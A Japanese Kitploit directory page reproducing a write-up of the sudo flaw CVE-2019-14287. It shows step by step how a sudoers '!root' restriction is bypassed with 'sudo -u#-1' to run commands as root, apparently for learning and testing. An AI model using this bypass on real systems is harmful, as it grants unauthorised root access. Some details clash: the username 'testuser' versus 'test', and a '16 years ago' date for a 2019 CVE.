Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-14287-write-up | Kitploit
ツール/GitHubGitHub/gurneesh/cve-2019-14287-write-up
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育
GitHubgurneesh/cve-2019-14287-write-up

CVE-2019-14287-write-up

リポジトリを見る
16年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-14287-解説

4294967295 Sudo のバグにより、制限されたユーザーが root としてコマンドを実行できる

脆弱性のデモ

新しいユーザーを追加:

sudo su - root useradd -m -s /bin/bash testuser passwd testuser // ユーザーにパスワードを追加 visudo

新しいエントリを追加

test ALL=(ALL, !root) /usr/bin/id // このユーザーは root ユーザーで id コマンドを使用できないように指定

ファイルを保存し、root ユーザーからログアウト

テストユーザーにログイン

sudo su - test

コマンドを実行

sudo id 次のメッセージが表示されます: Sorry, user test is not allowed to execute '/usr/bin/id' as root

次にコマンドを実行

sudo -u#-1 id または sudo -u#4294967295 id

これで、root を使用して id コマンドを実行できました

ツールをダウンロード